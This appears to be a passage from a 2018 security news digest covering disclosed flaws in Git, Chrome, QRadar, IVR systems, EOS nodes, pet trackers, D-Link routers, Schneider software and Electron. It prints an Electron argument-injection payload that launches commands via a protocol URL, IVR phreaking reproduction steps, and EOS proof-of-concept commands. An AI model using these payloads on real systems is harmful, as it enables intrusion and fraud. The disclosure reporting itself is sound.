Vulnerable versions of git allow the folder name to contain a path that is not necessarily beneath the .git directory. This can allow an attacker to carefully create a parent repository that has another Git repository checked in, as a folder inside that parent repository. Then that repository that's checked in can be added as a submodule to the parent repository. That submodule's location can be set outside of the .git folder, pointing to the checked-in repository inside the parent itself.

When you recursively clone this parent repository, Git will look at the submodule that has been configured, then look for where to store that submodule's repository. It will follow the configuration into the parent repository itself, to the repository that's been checked in as a folder. That repository will be used to check out the submodule… and, unfortunately, any hooks in that checked-in repository will be run.

So the attacker can bundle this repository configuration with a malicious post-checkout hook, and their code will be executed immediately upon your (recursive) clone of the repository.”

Microsoft, GitLab, GitHub and likely other Git hosting providers have taken steps to prevent abuse. However, users have still been advised to update their Git clients.

The second flaw is considered less serious. The issue is related to Git performing “path sanity-checks on NTFS that can be fooled into reading arbitrary memory.”


Chrome 67 Patches 34 Vulnerabilities
30.5.2018 securityweek 
Vulnerebility 

Google this week released Chrome 67 to the stable channel to provide various improvements, including patches for 34 vulnerabilities.

After introducing it in Chrome 63 in December, Google is now making Site Isolation available for more users. The functionality ensures that each opened website is rendered in a separate process, thus isolating it from the processes of other websites and delivering stronger security boundaries.

Chrome’s Site Isolation was also meant as a form of mitigation against the web-exploitable Spectre vulnerability affecting modern micro-processors. Since the beginning of the year, together with Meltdown, another CPU flaw, Spectre has fueled an industry-wide race to release patches and mitigations.

“We're continuing to roll out Site Isolation to a larger percentage of the stable population in Chrome 67. Site Isolation improves Chrome's security and helps mitigate the risks posed by Spectre,” Google notes in a blog post.

Of the 34 security fixes delivered in the new browser release, 24 are for vulnerabilities reported by external researchers. These include 9 flaws rated High severity, 12 assessed with a Medium risk, and 3 considered Low severity.

The most important issues addressed in Chrome 67 include Use after free in Blink (CVE-2018-6123), Type confusion in Blink (CVE-2018-6124), Overly permissive policy in WebUSB (CVE-2018-6125), Heap buffer overflow in Skia (CVE-2018-6126), Use after free in indexedDB (CVE-2018-6127), uXSS in Chrome on iOS (CVE-2018-6128), Out of bounds memory access in WebRTC (CVE-2018-6129 and CVE-2018-6130), and Incorrect mutability protection in WebAssembly (CVE-2018-6131).

The Medium severity bugs addressed in this release include Use of uninitialized memory in WebRTC, URL spoof in Omnibox, Referrer Policy bypass in Blink, UI spoofing in Blink, Out of bounds memory access in V8, Leak of visited status of page in Blink, Overly permissive policy in Extensions, Restrictions bypass in the debugger extension API, Heap buffer overflow in Skia, and Out of bounds memory access in V8.

Google also addressed Out of bounds memory access in PDFium, Incorrect escaping of MathML in Blink, and Password fields not taking advantage of OS protections in Views.

The search engine giant paid over $30,000 in bug bounties to the reporting security researchers. However, the company has yet to publish full details on the rewards.


Flaws in IBM QRadar Allow Remote Command Execution
29.5.2018 securityweek
Vulnerebility 

Three vulnerabilities discovered by a researcher in IBM’s QRadar product can be chained for an exploit that allows a remote and unauthenticated attacker to bypass authentication and execute arbitrary commands with root privileges.

IBM QRadar is an enterprise security information and event management (SIEM) product designed to help security analysts identify sophisticated threats on their network and improve incident remediation.

Independent researcher Pedro Ribeiro discovered that IBM QRadar is affected by three potentially serious vulnerabilities, which he reported to the tech giant through Beyond Security’s SecuriTeam Secure Disclosure program.

According to IBM, the security holes impact QRadar SIEM 7.3.0 to 7.3.1 Patch 2, and QRadar SIEM 7.2.0 to 7.2.8 Patch 11. Patches are included in versions 7.3.1 Patch 3 and 7.2.8 Patch 12.

IBM has assigned a CVSS score of only 5.6 to the vulnerabilities, which it collectively tracks as CVE-2018-1418. However, the issues seem serious and an advisory in NIST’s National Vulnerability Database (NVD) shows a score of 9.8, which indicates a “critical” severity rating.

According to Beyond Security, QRadar has a built-in application for performing forensic analysis on files. While the application is disabled in the Community Edition, the code is there and part of it still works.

The application has two components: a Java servlet and the main component, which uses PHP. The first component is affected by a vulnerability that can be exploited to bypass authentication, while the second has a flaw that can be leveraged to download and execute a shell.

The flaw affecting the PHP component requires authentication, but that can be achieved by exploiting the first vulnerability. Chaining these vulnerabilities allows a remote attacker to execute arbitrary commands on the system, but only with low privileges (i.e. “nobody” user). However, Ribeiro discovered a third vulnerability that can be exploited to escalate privileges from “nobody” to root.

Beyond Security has made available technical details and proof-of-concept (PoC) code for these security holes.

Ribeiro has found many serious vulnerabilities in the past years, including in products from Netgear, NUUO, Asus, Kaseya and BMC.


Abusing Interactive Voice Response systems – Legacy Telecom [CVE-2018-11518]
29.5.2018 securityaffairs
Vulnerebility

A vulnerability tracked as CVE-2018-11518 could be exploited by attackers to power a phreaking attack on HCL legacy Interactive Voice Response systems that do not use VoIP.
These IVR systems rely on various frequencies of audio signals; based on the frequency, certain commands and functions are processed. Since these frequencies are accepted within a phone call, an attacker can record these frequencies and use them to
activate services or to get sensitive information.

Summary: Dual-tone multi-frequency signaling (DTMF) is a voice-frequency used in
Interactive Voice Response systems (IVRs).

Interactive Voice Response systems

For each key pressed, a dial tone is created by combining the frequencies of the
corresponding numbers row and column. For example, the dial tone of “5” is created by
combining the frequency of “770Hz” and “1336 Hz” and the resultant is the frequency
of “5”.
Abstract: The attack is a phreak attack on IVR systems which are yet to be completely
made VOIP. These Interactive Voice Response systems work on frequency and based on the frequency certain commands and functions are processed. Since these frequencies are generated by the phone, these frequencies are recorded and used to activate services or to get sensitive information for one or multiple users at the same time.

Steps to reproduce attack:

First of all you need a recording of the IVR frequencies. This is nothing but the
different frequency that for each number that is taken by IVR to process it. Once
we have the frequencies recorded as mp3, m4a or any other format let’s begin.
Call any toll free number (possibly 198 in India) using any telecom operator SIM.
Dial the toll free number according to your country and operator.
You will hear the recoded voice saying something like “Press 1 for English, 2 for
Hindi,” this is the time you have to play your recorded frequency. Suppose you
want to select English, play the frequency for dial tone 1 from another device or
laptop or through speakers. The IVR will take this as input and process it and
make your language as English.
Possible attack scenarios: In the attack scenarios described above we only used
frequencies that of dial tone from 0-9, it is possible to disrupt the systems, control any
users IVR input and subscribe for services, change settings, extract information and
can also cause a denial of service.
CVE-2018-11518 is been assigned to HCL legacy IVR systems, however our research
says IVR belonging to the vendors such as IBM, COMVIVA, SPICEDIGITAL might be
vulnerable to such attacks.


EOS Node Remote Code Execution Vulnerability — EOS WASM Contract Function Table Array Out of Bounds
29.5.2018 securityaffairs
Vulnerebility

Security experts from the 360 Core Security Team have found and successfully exploited a buffer out-of-bounds write vulnerability in EOS node when parsing a WASM file.
Vulnerability Description
We found and successfully exploit a buffer out-of-bounds write vulnerability in EOS when parsing a WASM file.

To use this vulnerability, attacker could upload a malicious smart contract to the nodes server, after the contract get parsed by nodes server, the malicious payload could execute on the server and take control of it.

After taken control of the nodes server, attacker could then pack the malicious contract into the new block and further control all nodes of the EOS network.

Vulnerability Reporting Timeline
2018-5-11 EOS Out-of-bound Write Vulnerability Found

2018-5-28 Full Exploit Demo of Compromise EOS Super Node Completed

2018-5-28 Vulnerability Details Reported to Vendor

2018-5-29 Vendor Fixed the Vulnerability on Github and Closed the Issue

2018-5-29 Notices the Vendor the Fixing is not complete

Some Telegram chats with Daniel Larimer:

We trying to report the bug to him.

He said they will not ship the EOS without fixing, and ask us to send the report privately since some people are running public test nets

EOS

He provided his mailbox and we send the report to him

EOSEOS 3

EOS fixed the vulnerability and Daniel would give the acknowledgment.

EOS 4

Technical Detail of the Vulnerability
This is a buffer out-of-bounds write vulnerability

At libraries/chain/webassembly/binaryen.cpp (Line 78),Function binaryen_runtime::instantiate_module:

for (auto& segment : module->table.segments) {
Address offset = ConstantExpressionRunner<TrivialGlobalManager>(globals).visit(segment.offset).value.geti32();
assert(offset + segment.data.size() <= module->table.initial);
for (size_t i = 0; i != segment.data.size(); ++i) {
table[offset + i] = segment.data[i]; <= OOB write here !
}
}

Here table is a std::vector contains the Names in the function table. When storing elements into the table, the |offset| filed is not correctly checked. Note there is an assert before setting the value, which checks the offset, however, unfortunately, |assert| only works in Debug build and does not work in a Release build.

The table is initialized earlier in the statement:

table.resize(module->table.initial);

Here |module->table.initial| is read from the function table declaration section in the WASM file and the valid value for this field is 0 ~ 1024.

The |offset| filed is also read from the WASM file, in the data section, it is a signed 32-bits value.

So basically with this vulnerability, we can write to a fairly wide range after the table vector’s memory.

How to reproduce the vulnerability
Build the release version of latest EOS code
./eosio-build.sh

Start EOS node, finish all the necessary settings described at:
https://github.com/EOSIO/eos/wiki/Tutorial-Getting-Started-With-Contracts

Set a vulnerable contract:
We have provided a proof of concept WASM to demonstrate a crash.

In our PoC, we simply set the |offset| field to 0xffffffff so it can crash immediately when the out of bound write occurs.

To test the PoC:
cd poc
cleos set contract eosio ../poc -p eosio

If everything is OK, you will see nodes process gets a segment fault.

The crash info:

(gdb) c

Continuing.

Program received signal SIGSEGV, Segmentation fault.

0x0000000000a32f7c in eosio::chain::webassembly::binaryen::binaryen_runtime::instantiate_module(char const*, unsigned long, std::vector<unsigned char, std::allocator<unsigned char> >) ()

(gdb) x/i $pc

=> 0xa32f7c <_ZN5eosio5chain11webassembly8binaryen16binaryen_runtime18instantiate_moduleEPKcmSt6vectorIhSaIhEE+2972>: mov %rcx,(%rdx,%rax,1)

(gdb) p $rdx

$1 = 59699184

(gdb) p $rax

$2 = 34359738360

Here |rdx| points to the start of the |table| vector,

And |rax| is 0x7FFFFFFF8, which holds the value of |offset| * 8.
Exploit the vulnerability to achieve Remote Code Execution
This vulnerability could be leveraged to achieve remote code execution in the nodeos process, by uploading malicious contracts to the victim node and letting the node parse the malicious contract. In a real attack, the attacker may publish a malicious contract to the EOS main network.

The malicious contract is first parsed by the EOS supernode, then the vulnerability was triggered and the attacker controls the EOS super node which parsed the contract.

The attacker can steal the private key of super nodes or control content of new blocks. What’s more, attackers can pack the malicious contract into a new block and publish it. As a result, all the full nodes in the entire network will be controlled by the attacker.

We have finished a proof-of-concept exploit, and tested on the nodeos build on 64-bits Ubuntu system. The exploit works like this:

The attacker uploads malicious contracts to the nodeos server.
The server nodeos process parses the malicious contracts, which triggers the vulnerability.
With the out of bound write primitive, we can overwrite the WASM memory buffer of a WASM module instance. And with the help of our malicious WASM code, we finally achieve arbitrary memory read/write in the nodeos process and bypass the common exploit mitigation techniques such as DEP/ASLR on 64-bits OS.
Once successfully exploited, the exploit starts a reverse shell and connects back to the attacker.
You can refer to the video we provided to get some idea about what the exploit looks like, We may provide the full exploit chain later.
The Fixing of Vulnerability
Bytemaster on EOS’s github opened issue 3498 for the vulnerability that we reported:

And fixed the related code

But as the comment made by Yuki on the commit, the fixing still has problems on 32-bits process and not so perfect.

The 360 Core Security Team credited Yuki Chen of Qihoo 360 Vulcan Team and Zhiniang Peng of Qihoo 360 Core Security for the discovery of the vulnerability.


I know where your pet is
26.5.2018 Kaspersky
Vulnerebility
Kaspersky Lab’s many years of cyberthreat research would suggest that any device with access to the Internet will inevitably be hacked. In recent years, we have seen hacked toys, kettles, cameras, and irons. It would seem that no gadget has escaped the attention of hackers, yet there is one last bastion: “smart” devices for animals. For example, trackers to monitor their location. Such gadgets can have access to the owner’s home network and phone, and their pet’s location.

This report highlights the potential risks for users and manufacturers. In it, we examine several trackers for potential vulnerabilities. For the study, we chose some popular models that have received positive reviews:

Kippy Vita
LINK AKC Smart Dog Collar
Nuzzle Pet Activity and GPS Tracker
TrackR bravo and pixel
Tractive GPS Pet Tracker
Weenect WE301
Whistle 3 GPS Pet Tracker & Activity Monitor
Technologies used: Bluetooth LE
The four trackers in the study use Bluetooth Low Energy (BLE), which in many cases is the weak spot in the device’s protective armor. Let’s take a closer look at this technology. BLE is an energy-saving Bluetooth specification widely used in IoT devices. What we’re interested in is the lack of authentication and the availability of services and characteristics.

Unlike “classic” Bluetooth, where peer devices are connected using a PIN code, BLE is aimed at non-peer devices, one of which may not have a screen or keyboard. Thus, PIN code protection is not implemented in BLE — authentication depends entirely on the developers of the device, and experience shows that it is often neglected.

The second feature of interest to us is the availability of services, characteristics, and descriptors. They form the basis for data transfer between devices in the BLE specification. As we already noted, BLE works with non-peer devices, one of which (the one that does the connecting) is usually a smartphone. The other device, in our case, is a tracker. After connecting to it, several BLE services are available to the smartphone. Each of them contains characteristics which in turn may have descriptors. Both characteristics and descriptors can be used for data transfer.

Hence, the correct approach to device security in the case of BLE involves pre-authentication before characteristics and descriptors are made available for reading and writing. Moreover, it is good practice to break the link shortly after connecting if the pre-authentication stage is not passed. In this case, authentication should be based on something secret that is not accessible to the attacker—for example, the first part of the data can be encrypted with a specific key on the server (rather than the app) side. Or transmitted data and the MAC address of the connected device can be confirmed via additional communication channels, for example, a built-in SIM card.

Kippy Vita
This tracker transfers GPS coordinates to the server via its built-in SIM card, and the pet’s location is displayed in the mobile app. The tracker does not interface “directly” with the smartphone. We could not detect any problems in the device itself, so we turned our focus to the mobile apps.

Here, too, everything looked pretty good: SSL Pinning was implemented, unlike in any other app we tested. Moreover, the Android app encrypts important data before saving it to its own folder.

The only problem we did detect was that the app for Android logs data that is transmitted to the server. This data can include the user’s password and login, as well as an authentication token.


Output of the Kippy Vita app with user login and password

Despite the fact that not all apps can read logs (only system apps or ones with superuser rights), it is still a major security issue.

Registered CVE:
CVE-2018-9916

Link AKC
This tracker monitors the pet’s location via GPS and transfers coordinates via the built-in SIM card. What’s more, it can interface with the owner’s phone directly — via Bluetooth LE. And this means that it is always ready to connect devices, which makes a good starting point for the study.

We were pleasantly surprised by Link AKC: the developers did everything right in terms of securing the connection to the smartphone. We couldn’t find any major problems, which is rare for devices with BLE support.

After the smartphone connects to the device and discovers services, it should enable notifications (that is, inform the tracker of expected changes) in two characteristics and a descriptor (otherwise the tracker breaks the link). After that Link AKC is ready to receive commands. They should contain the user ID; if the user does not have rights to use the tracker, the command is not executed. This maintains control over access rights. Even using the ID obtained from the tested device, we could not make the gadget execute a command from another smartphone—it appears that the tracker checks the smartphone’s MAC address.

However, the device cannot be described as completely secure. In the app for Android, we found that the developers had forgotten to disable logging. As a result, the app transfers lots of data to logcat, including:

the app’s authorization token, which if intercepted can be used to sign into the service and discover the pet’s location:

User registration data, including name and email address:

Device coordinates:

Starting with Android 4.1, only some system apps or apps with superuser rights can read the logs of other programs. It is also possible to gain access when connecting the smartphone to a computer, but this requires Android developer mode to be activated.

Despite these restrictions, it is still a problem: attackers can get hold of data to access the victim’s account, even if the likelihood of this happening is small.

On top of that, the Android app does not verify the server’s HTTPS certificate, exposing it to man-in-the-middle (MITM) attacks. For a successful attack, attackers need only install their own certificate on the smartphone (which is quite simple to do), allowing them to intercept all transmitted data, including passwords and tokens used for account access:


The Link AKC app for Android is vulnerable to MITM attacks

The authorization token is also stored in unencrypted form in the app folder. Although superuser rights are needed to access it, it is still not the best place to store important data.

The authorization token is stored in unencrypted form

Registered CVE:
CVE-2018-7041

Nuzzle
In terms of functionality, Nuzzle is like the previous tracker: It too uses a SIM card to transmit the pet’s GPS coordinates and can directly connect to a smartphone via BLE. But on the latter point, Nuzzle performed less well than Link AKC: the lack of authorization and access control means that the device is ready to interface with any smartphone. This lets an attacker take control of the device, just like the owner. For example, it can quickly discharge the battery by turning on the light bulb (for which the value of just one attribute needs changing).

An attacker can receive data from the device as soon as a connection is made. Data is available in two characteristics: one contains telemetry information, including device location, while the other provides device status information (in particular, temperature and battery charge).

What is worse, the continuous reading of data from the telemetry characteristic results in the device being “lost”: to save battery power, the gadget does not transmit coordinates via the mobile network if they have already been sent via BLE. Thus, it is possible to conceal the location of the pet simply by connecting to the tracker using a smartphone.

We detected another security hole in the process of updating the device firmware. The integrity control was found to be easy to bypass. Basically, the firmware consists of two files with the extensions DAT and BIN. The first contains information about the firmware, including the checksum (CRC16) used in the integrity control, and the second contains the firmware itself. All it takes to install modified software on the tracker is to change the checksum in the DAT file.

AT commands in Nuzzle firmware

To cripple the device, we didn’t even need to analyze the firmware: it is not encrypted or packed, so just by opening it in a hex editor we were able to find the AT commands and the host used to send data by means of the SIM card. After we changed several bytes in the host, updated the firmware checksum, and uploaded it to the device, the tracker stopped working.

As in the case of Link AKC, the Nuzzle app for Android does not check the server certificate, and the authentication token and user email address are stored in the app folder in unencrypted form.


Unencrypted authorization token and user email address

Registered CVE:
CVE-2018-7043
CVE-2018-7042
CVE-2018-7045
CVE-2018-7044

TrackR
Two TrackR devices featured in our study: Bravo and Pixel. These “trinkets” differ from previous devices in that their tracking range (if indeed they are intended to track pets) is limited to 100 meters: unlike other models, they have no GPS module or SIM card, and the only link to them is via Bluetooth LE. Their main purpose is to locate keys, remote controls, etc. around the apartment. However, the developers have equipped the devices with an option that lets them partially track the movements of something: the trackers location can be transmitted “via” the smartphones of other TrackR app users. If the app is running on the smartphone, it will transfer data to the service about all “trinkets” detected nearby, together with the smartphone coordinates. Therein lies the first defect: anyone can sign into the mobile app and send fake coordinates.

We managed to identify a few more problems, but as it turned out, most of them had already been discovered by our colleagues at Rapid7. Although their research was published more than a year ago, some vulnerabilities had yet to be fixed at the time of penning this article.

For instance, the devices have no authentication when connecting via Bluetooth LE, which means they are open to intruders. An attacker could easily connect and turn on the audio signal, for example, simply by changing the value of one characteristics. This could let an attacker find the animal before its owner does or run down the tracker battery.

Structure of TrackR services and attributes

Besides, the app for Android does not verify server certificates, meaning that an MITM attack could lead to the interception of the password, authentication token, user email address, and device coordinates.

TrackR Android app requests contain an authentication token

On the bright side, the app does not store the authentication token or password in their own folder, which is the proper way to guard against Trojans that use superuser rights to steal data.

Registered CVE:
CVE-2018-7040
CVE-2016-6541

Tractive
Unlike most devices we studied, this tracker does not communicate directly with the smartphone—only through its own servers. This approach is secure enough, but we detected some minor issues in the Android app. First, as in other cases, it does not verify the server certificate, which facilitates MITM attacks. What’s more, the app stores the authentication token in unencrypted form:


As well as pet movement data:


It should be noted that this data is not so easy to steal, since other apps cannot read it. But there are Trojans that can steal data from other apps by exploiting superuser rights.

Weenect WE301
This is another tracker that doesn’t interface with the owner’s smartphone directly, but transfers pet coordinates to the server via a built-in SIM card. We didn’t encounter any security issues with this tracker, but problems similar to those in Tractive were detected in the Android version of the app.

First, it does not prevent MITM attacks, allowing attackers to access the user’s account or intercept geoinformation. Second, authentication data is stored in the app folder in unencrypted form, exposing it to Trojans with superuser rights on the device.

Whistle 3
This is one of the most technically interesting trackers in the study. It can transfer GPS coordinates via its built-in SIM card, via Wi-Fi to its server (if the owner provides a Wi-Fi network password), or directly to the owner’s smartphone via BLE.

We looked at Wi-Fi first of all and found that the developers had taken care to secure the connection: The device transmits small portions of data over HTTPS (that is, in encrypted form).

Wi-Fi data transfer is secured using HTTPS

Next, we checked the BLE connection and found many security issues. The first is the lack of proper authentication. After connecting, the device waits for a certain sequence of actions to be performed, which could be described as pre-authentication. The sequence is so simple that a third party can easily reproduce it. All it takes is to connect to the device, transfer two characteristics to WRITE_TYPE_NO_RESPONSE mode, request a change in the size of transmitted data (MTU), turn on notifications for one characteristics, and transfer a certain number to another characteristics.

Now the tracker is ready to receive and execute commands that do not contain a user ID, which means that anyone can send them. For example, it is possible to send an initiateSession command, and in response the device will send an unencrypted set of data, including the device coordinates. What’s more, if this command is continuously transmitted, the gadget will not send location data via the SIM card, since it will assume that such data has already been received “directly.” Thus, it is possible to “hide” the tracker from its owner.

There is one more problem: the tracker transmits data to the server without any authentication. This means that anyone can substitute it, altering the coordinates in the process.

The app transmits data received from the tracker via BLE

The Android app uses the HTTPS protocol (which is good), but does not verify the server certificate.

MITM attacks can intercept user data

Not only that, the smartphone app stores user data in unencrypted form in its own folder, exposing it to theft by a Trojan with superuser rights. However, authentication data is stored correctly.

Tracker coordinates from the app database

Note that the Android app writes data to logcat. As mentioned above, despite the fact that other app logs can read only some system utilities or apps with superuser rights, there is no need to write important data to the log.

The Android app can log user and pet data (activity, email address, name, owner’s phone number), as well as one of the used tokens

Registered CVE:
CVE-2018-8760
CVE-2018-8757
CVE-2018-8759
CVE-2018-9917

Conclusions
GPS trackers have long been applied successfully in many areas, but using them to track the location of pets is a step beyond their traditional scope of application for this, they need to be upgraded with new “user communication interfaces” and “trained” to work with cloud services, etc. If security is not properly addressed, user data becomes accessible to intruders, endangering both users and pets.

Research results: four trackers use Bluetooth LE technology to communicate with the owner’s smartphone, but only one does so correctly. The rest can receive and execute commands from anyone. Moreover, they can be disabled or hidden from the owner—all that’s required is proximity to the tracker.

Just one of the tested Android apps verifies the certificate of its server, without relying solely on the system. As a result, they are vulnerable to MITM attacks—intruders can intercept transmitted data by “persuading” victims to install their certificate.


Backdoors in D-Link’s backyard

26.5.2018 Kaspersky Vulnerebility
Multiple vulnerabilities in D-Link DIR-620 router
“If you want to change the world, start with yourself.” In the case of security research this can be rephrased to: “If you want to make the world safer, start with the smart things in your home.” Or, to be more specific, start with your router – the core of any home network as well as an interesting research object. And that router you got from your ISP as part of your internet contract is even more interesting when it comes to research.

The impact of vulnerabilities
Note: the following information about vulnerabilities has been submitted to the respective stakeholders (D-Link, ISP provider, Mitre) and we are publishing this information in accordance with vulnerability disclosure policy.

The following advisory describes four vulnerabilities and hardcoded accounts in D-Link DIR-620 firmware. The firmware runs on various D-Link routers that one of the biggest ISPs in Russia delivers to its customers (this conclusion is based on the fact that the router is provided as part of the standard customer contract and the hardcoded credentials contain the name of the ISP in the login string). This is probably why this particular model of router is so popular in Russia and CIS countries (most home routers are located behind their ISP’s NAT, which is why these routers don’t appear in the statistics).

Geography of vulnerable routers


The object of research
The latest versions of the firmware have hardcoded default credentials that can be exploited by an unauthenticated attacker to gain privileged access to the firmware and to extract sensitive data, e.g., configuration files with plain-text passwords. The vulnerable web interface allows an unauthenticated attacker to run arbitrary JavaScript code in the user environment and run arbitrary commands in the router’s operating system (OS).

Example of firmware interface (probably customized for ISP purposes)

These issues were originally identified in firmware version 1.0.37. Some of the discovered vulnerabilities were also identified in other versions of the firmware:

1.3.1
1.3.3
1.4.0
2.0.22
Technical details
Weakness in user data validation (reflected cross-site scripting) (CVE-2018-6212)
The one input field that allows user input – Quick search – inspired me to look deeper into the firmware: the field facilitates an XSS attack vector. A reflected cross-site scripting (XSS) attack is possible as a result of missed filtration for special characters in this field and incorrect processing of the XMLHttpRequest object (this vulnerability was discovered in v.1.3.3, but also present in other versions).

Demonstration of a reflected XSS

Vulnerability metrics:

CVSS v3 Base Score: 6.1

Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

Hardcoded default credentials for web dashboard (CVE-2018-6213)
I downloaded the firmware and extracted the filesystem. Most Unix-based firmware includes BusyBox – software that provides several stripped-down Unix tools for embedded systems. It can easily identify the proprietary binary files, i.e., all binaries that are not in the original BusyBox toolset and which were probably modified for ISP purposes.

I extracted strings from the web server binary (httpd), and my attention was immediately drawn to the “anonymous” string. I looked at the function where this string was being used.

The code responsible for checking the user’s credentials contains ‘harcoded credentials’

These privileged credentials cannot be changed by the administrator. Privileged access to the dashboard allows an attacker to extract sensitive data.

Vulnerability metrics:

CVSS v3 Base Score: 6.5

Vector: (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

OS command injection (CVE-2018-6211)
An OS command injection vulnerability is possible as a result of incorrect processing of the user’s input data in the following parameter (the vulnerability was discovered in v.1.0.3):

/index.cgi?<…>&res_buf

Example of request with OS command injection

Vulnerability metrics:

CVSS v3 Base Score: 9.1

Vector: (/CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)

Hardcoded default credentials for Telnet (CVE-2018-6210)
Using the vulnerability above, an attacker can extract Telnet credentials. The credentials were discovered in firmware v1.0.3. For example, by using the default credentials for Telnet an attacker can get administrative access to a router (the fragment of “etc/passwd”).

Demonstration of OS command injection vulnerability

Vulnerability metrics:

CVSS v3 Base Score: 10.0

Vector: (/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

How to fix it
We received an official response from the vendor stating that this router model was no longer supported. In this case, we provide the following recommendations:

Restrict any access to the web dashboard using a whitelist of trusted IPs
Restrict any access to Telnet
Regularly change your router admin username and password
Advisory Status
01/15/2018 – reported to vendor
01/15/2018 – reported to ISP
01/24/2018 – received a response from ISP
02/06/2018 – received a response from vendor. Official statement: the model of router was no longer supported by vendor, so vendor will only patch vulnerabilities if the ISP sends a request to do so.


CVE-2018-7783 flaw in Schneider SoMachine Basic can be exploited to read arbitrary files on the targeted system
26.5.2018 securityaffairs 
Vulnerebility

Schneider Electric issued a security update for its EcoStruxure Machine Expert (aka SoMachine Basic) product that addresses a high severity vulnerability, tracked CVE-2018-7783, that could be exploited by a remote and unauthenticated attacker to obtain sensitive data.

“SoMachine Basic suffers from an XML External Entity (XXE) vulnerability using the DTD parameter entities technique resulting in disclosure and retrieval of arbitrary data on the affected node via out-of-band (OOB) attack.” reads the security advisory published by Schneider Electric.

“The vulnerability is triggered when input passed to the xml parser is not sanitized while parsing the xml project/template file”

The EcoStruxure Machine Expert is a tool to program Schneider Modicon M221 programmable logic controller (PLC).

The ML external entity (XXE) vulnerability was discovered by the Gjoko Krstic, a researcher at industrial cybersecurity firm Applied Risk.

According to the expert, the flaw affects SoMachine Basic 1.6.0 build 61653, 1.5.5 SP1 build 60148, and likely earlier versions, it could be exploited by an attacker to launch an out-of-band (OOB) attack.

In order to exploit the flaw, the attacker has to trick victims to open a specially crafted SoMachine Basic project or template file.

Krstic also discovered that in certain circumstances the attackers can trigger the vulnerability for arbitrary code execution and to cause a denial-of-service (DoS) condition.

Schneider Electric addressed the vulnerability with the release of SoMachine Basic v1.6 SP1.

SoMachine Basic Schneider Electric

Early May, researchers at Tenable have disclosed technical details and a PoC code for a critical remote code execution vulnerability affecting Schneider Electric InduSoft Web Studio and InTouch Machine Edition products.

A few days ago, Schneider Electric published a security advisory to warn customers of multiple vulnerabilities in the Flexera FlexNet Publisher component used in the Schneider Electric Floating License Manager software in PlantStruxure PES.

One week ago, Schneider published another advisory to inform customers that these flaws also impact PlantStruxure PES.


Flaw in Schneider PLC Programming Tool Allows Remote Attacks
25.5.2018 securityweek 
Vulnerebility

Schneider Electric this week announced that an update for its EcoStruxure Machine Expert product patches a high severity vulnerability that can be exploited remotely to obtain sensitive data.

EcoStruxure Machine Expert - Basic, formerly known as SoMachine Basic, is a lightweight tool designed for programming Schneider’s Modicon M221 programmable logic controller (PLC).

Gjoko Krstic, a researcher at industrial cybersecurity firm Applied Risk, discovered recently that SoMachine Basic 1.6.0 build 61653, 1.5.5 SP1 build 60148, and likely earlier versions are impacted by an XML external entity (XXE) vulnerability that can be exploited to launch an out-of-band (OOB) attack.

Tracked as CVE-2018-7783, the vulnerability can be exploited by a remote and unauthenticated attacker to read arbitrary files on the targeted system. These files can include sensitive information, including passwords, user data, and details about the system.

For the attack to work, the hacker needs to convince the targeted user to open a specially crafted SoMachine Basic project or template file.

“The vulnerability is triggered when input passed to the XML parser is not sanitized while parsing the XML project and/or template file,” Krstic wrote in an advisory.

The researcher also pointed out that in certain circumstances the flaw can also be exploited for arbitrary code execution and to cause a denial-of-service (DoS) condition.

Schneider Electric patched the vulnerability with the release of SoMachine Basic v1.6 SP1.

Last month, at SecurityWeek’s ICS Cyber Security Conference in Singapore, Krstic disclosed the details of a DoS vulnerability that affects safety controllers from several major vendors, including devices that are directly exposed to the Internet.

In January, Schneider Electric informed customers that its Floating License Manager, a tool that helps organizations manage licenses for Schneider products, contained code execution, open redirect and DoS vulnerabilities due to the use of a third-party component named Flexera FlexNet Publisher. The security holes were discovered in FlexNet Publisher in 2016 and 2017.

One week ago, Schneider published another advisory to inform customers that these flaws also impact PlantStruxure PES. ICS-CERT has also published an advisory on Thursday for the Floating License Manager issues.


Electron Windows Protocol Handler MITM/RCE (bypass for CVE-2018-1000006 fix)
25.5.2018 securityaffairs
Vulnerebility  

As part of an engagement for one of our clients, we analyzed the patch for the recent Electron Windows Protocol handler RCE bug (CVE-2018-1000006) and identified a bypass.
Under certain circumstances, this bypass leads to session hijacking and remote code execution. The vulnerability is triggered by simply visiting a web page through a browser. Electron apps designed to run on Windows that register themselves as the default handler for a protocol and do not prepend dash-dash in the registry entry are affected.

We reported the issue to the Electron core team (via security@electronjs.org) on May 14, 2018, and received immediate notification that they were already working on a patch. The issue was also reported by Google’s Nicolas Ruff a few days earlier.

CVE-2018-1000006
On January 22, 2018, Electron released a patch for v1.7.11, v1.6.16 and v1.8.2-beta4 for a critical vulnerability known as CVE-2018-1000006 (surprisingly no fancy name here) affecting Electron-based applications running on Windows that register custom protocol handlers.

The original issue was extensively discussed in many blog posts, and can be summarized as the ability to use custom protocol handlers (e.g. myapp://) from a remote web page to piggyback command line arguments and insert a new switch that Electron/Chromium/Node would recognize and execute while launching the application.

<script>
win.location = 'myapp://foobar" --gpu-launcher="cmd c/ start calc" --foobar='
</script>
Interestingly, on January 31, 2018, Electron v1.7.12, v1.6.17 and v1.8.2-beta5 were released. It turned out that the initial patch did not take into account uppercase characters and led to a bypass in the previous patch with:

<script>
win.location = 'myapp://foobar" --GPU-launcher="cmd c/ start calc" --foobar='
</script>
Understanding the patch
The patch for CVE-2018-1000006 is implemented in electron/atom/app/command_line_args.cc and consists of a validation mechanism which ensures users won’t be able to include Electron/Chromium/Node arguments after an url (the specific protocol handler). Bear in mind some locally executed applications do require the ability to pass custom arguments.

bool CheckCommandLineArguments(int argc, base::CommandLine::CharType** argv) {
DCHECK(std::is_sorted(std::begin(kBlacklist), std::end(kBlacklist),
[](const char* a, const char* b) {
return base::StringPiece(a) < base::StringPiece(b);
}))
<< "The kBlacklist must be in sorted order";
DCHECK(std::binary_search(std::begin(kBlacklist), std::end(kBlacklist),
base::StringPiece("inspect")))
<< "Remember to add Node command line flags to kBlacklist";

const base::CommandLine::StringType dashdash(2, '-');
bool block_blacklisted_args = false;
for (int i = 0; i < argc; ++i) {
if (argv[i] == dashdash)
break;
if (block_blacklisted_args) {
if (IsBlacklistedArg(argv[i]))
return false;
} else if (IsUrlArg(argv[i])) {
block_blacklisted_args = true;
}
}
return true;
}
